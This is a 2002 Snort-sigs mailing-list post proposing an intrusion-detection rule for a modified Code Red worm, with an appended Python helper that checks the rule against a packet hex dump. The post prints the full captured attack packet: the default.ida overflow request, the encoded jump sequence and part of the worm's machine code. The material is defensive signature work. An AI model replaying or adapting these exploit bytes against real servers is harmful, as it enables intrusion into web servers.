[Snort-sigs] New Code Red v3 signature

Robert Wagner rwagner at ...447...
Mon Apr 8 08:46:24 EDT 2002


Feel free to pick a better name. It appears that the original worm has been
modified.  Let me know if you find a better signature.
This is a little bit bulky, but it may help you identify this worm:

# The rule spans several lines with Snort's trailing-backslash continuation; the
# uricontent value is kept on one line because it must not be broken inside the
# quotes, and nocase is placed directly after the uricontent it modifies.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS CodeRed v3 root.exe access"; \
    flags: A+; \
    uricontent:"|4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 C3 03 00 00 00 78 00 FA 20 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63|"; nocase; \
    tag: host, 300, packets, src; \
    classtype:web-application-attack; sid: 1256; rev:2;)

This should pick up this part of the attack:
0x03E0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03F0: 4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  N...............
0x0400: C3 03 00 00 00 78 00 FA 20 25 75 39 30 39 30 25  .....x.. %u9090%
0x0410: 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30  u6858%ucbd3%u780
0x0420: 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63  1%u9090%u6858%uc
0x0430: 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25  bd3%u7801%u9090%
0x0440: 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63  u9090%u8190%u00c


----------------------------------------------------------------------------
Here is the whole packet:
0x0000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x00A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x00B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x00C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x00D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x00E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x00F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0170: 06 50 00 50 72 BB 3C CB D9 98 3E DF 50 18 44 70  .P.Pr.<...>.P.Dp
0x0180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x01A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x01B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x01C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x01D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x01E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x01F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x02A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x02B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x02C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x02D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x02E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x02F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0300: 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61  GET /default.ida
0x0310: 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  ?NNNNNNNNNNNNNNN
0x0320: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0330: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0340: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0350: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0360: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0370: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0380: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0390: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03A0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03B0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03C0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03D0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03E0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03F0: 4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  N...............
0x0400: C3 03 00 00 00 78 00 FA 20 25 75 39 30 39 30 25  .....x.. %u9090%
0x0410: 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30  u6858%ucbd3%u780
0x0420: 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63  1%u9090%u6858%uc
0x0430: 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25  bd3%u7801%u9090%
0x0440: 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63  u9090%u8190%u00c
0x0450: 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35  3%u0003%u8b00%u5
0x0460: 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25  31b%u53ff%u0078%
0x0470: 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54  u0000%u00=a  HTT
0x0480: 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74  P/1.0..Content-t
0x0490: 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 48 4F  ype: text/xml.HO
0x04A0: 53 54 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F 6D 0A  ST:www.worm.com.
0x04B0: 20 41 63 63 65 70 74 3A 20 2A 2F 2A 0A 43 6F 6E   Accept: */*.Con
0x04C0: 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 35 36  tent-length: 356
0x04D0: 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 02 00 00 53  9 ....U........S
0x04E0: 56 57 8D BD E8 FD FF FF B9 86 00 00 00 B8 CC CC  VW..............
0x04F0: CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00 E9 0A  ......p.........
0x0500: 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF FF 64  .....h.........d
0x0510: A1 00 00 00 00 89 47 08 64 89 3D 00 00 00 00 E9  ......G.d.=.....
0x0520: 6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE FF FF  o.....`.........
0x0530: FF FF FF FF 8B 85 68 FE FF FF 83 E8 07 89 85 F4  ......h.........
0x0540: FE FF FF C7 85 58 FE FF FF 00 00 E0 77 E8 9B 0A  .....X......w...
0x0550: 00 00 83 BD 70 FE FF FF 00 0F 85 DD 01 00 00 8B  ....p...........
0x0560: 8D 58 FE FF FF 81 C1 00 00 01 00 89 8D 58 FE FF  .X...........X..
0x0570: FF 81 BD 58 FE FF FF 00 00 00 78 75 0A C7 85 58  ...X......xu...X
0x0580: FE FF FF 00 00 F0 BF 8B 95 58 FE FF FF 33 C0 66  .........X...3.f
0x0590: 8B 02 3D 4D 5A 00 00 0F 85 9A 01 00 00 8B 8D 58  ..=MZ..........X
0x05A0: FE FF FF 8B 51 3C 8B 85 58 FE FF FF 33 C9 66 8B  ....Q<..X...3.f.
0x05B0: 0C 10 81 F9 50 45 00 00 0F 85 79 01 00 00 8B 95  ....PE....y.....
0x05C0: 58 FE FF FF 8B 42 3C 8B 8D 58 FE FF FF 8B 54 01  X....B<..X....T.
0x05D0: 78 03 95 58 FE FF FF 89 95 54 FE FF FF 8B 85 54  x..X.....T.....T
0x05E0: FE FF FF 8B 48 0C 03 8D 58 FE FF FF 89 8D        ....H...X.....
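
As an added example that is not part of the original post, the following Python script reassembles a payload from a dump in the format shown above and checks whether the rule's uricontent bytes actually occur in it, which is a quick offline sanity check of a signature against a capture before loading it into Snort. The dump rows are copied from the post; the function names and the contiguity check are my own.

```python
# Constructed sample, copied in the post's dump format: the rows around the
# section the rule is meant to match (0x03D0 through 0x0440).
SAMPLE_DUMP = """\
0x03D0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03E0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03F0: 4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  N...............
0x0400: C3 03 00 00 00 78 00 FA 20 25 75 39 30 39 30 25  .....x.. %u9090%
0x0410: 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30  u6858%ucbd3%u780
0x0420: 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63  1%u9090%u6858%uc
0x0430: 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25  bd3%u7801%u9090%
0x0440: 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63  u9090%u8190%u00c
"""

# The uricontent value from the rule above, byte for byte.
RULE_URICONTENT = (
    "|4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E "
    "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "
    "C3 03 00 00 00 78 00 FA 20 25 75 39 30 39 30 25 "
    "75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 "
    "31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 "
    "62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 "
    "75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63|"
)

def parse_hexdump(text: str) -> bytes:
    """Reassemble payload bytes from contiguous '0xOFFS: HH HH ...  ASCII' rows.
    The hex column is fixed width (cols 8..56), so the ASCII column is never
    mistaken for data."""
    payload, base = bytearray(), None
    for line in text.splitlines():
        if len(line) < 8 or not line.startswith("0x") or line[6] != ":":
            continue
        offset = int(line[2:6], 16)
        base = offset if base is None else base
        if offset != base + len(payload):
            raise ValueError(f"non-contiguous row at 0x{offset:04X}")
        payload += bytes.fromhex(line[8:56])
    return bytes(payload)

def snort_content_to_bytes(content: str) -> bytes:
    """Decode a Snort content string: text outside |...| is literal, text
    inside |...| is hex byte values (escapes such as \\| are not handled)."""
    out = bytearray()
    for i, part in enumerate(content.split("|")):
        out += part.encode("latin-1") if i % 2 == 0 else bytes.fromhex(part)
    return bytes(out)

def find_signature(payload: bytes, content: str) -> int:
    """Offset of the first occurrence of the rule content in payload, or -1."""
    return payload.find(snort_content_to_bytes(content))
```

Running find_signature(parse_hexdump(SAMPLE_DUMP), RULE_URICONTENT) returns 16, i.e. the match starts at row 0x03E0, exactly where the post says it should.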